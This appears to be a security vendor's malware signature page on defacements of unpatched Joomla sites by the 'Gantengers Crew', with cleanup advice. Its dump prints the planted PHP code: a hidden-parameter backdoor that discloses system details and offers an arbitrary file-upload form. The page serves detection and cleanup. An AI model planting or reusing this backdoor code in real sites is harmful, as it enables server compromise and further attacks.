Malware Signatures

  1. Home
  2. Malware Signatures
  3. html.defaced.gangtengers.001

html.defaced.gangtengers.001

Site got defaced by the Gantengers Crew. Typically, on hacked sites you will find the following files in various directories:
ganteng.htm, ganteng.php and ganteng.gif. Ganteng.php may show quite a minimalistic information that the site is hacked but if you pass a spefic parameter to it, the page will show detailed information about the compromised system.
Some of their scripts have the "patch" option that deletes vulnerable Joomla modules (quite rough patching).

Affecting

Any web site. However these hackers specifically target unpatched Joomla sites with vulnerabilities in JCE and Ozio Gallery.

Cleanup

Restore your site from a clean backup. Deleting all files first is the best option since it will delete all backdoors and other malicious files that
hackers could leave on the server. It is important to identify and close the security hole to prevent recurring attacks.
If you use Joomla, make sure to upgrade and fully patch it. Pay a special attention to component and plugins, especially to JCE and Ozio Gallery.
You can sign up with us and let our team remove the malware for you.

Dump

...excerpts from a typical defacement page...

<?php if(isset($_GET["vfusd"])){echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";print "n";$disable_functions = @ini_get("disable_functions");echo "DisablePHP=".$disable_functions;print "n";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?><title>Hacked by d3b~X</title><center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right: 0;top:43%}
...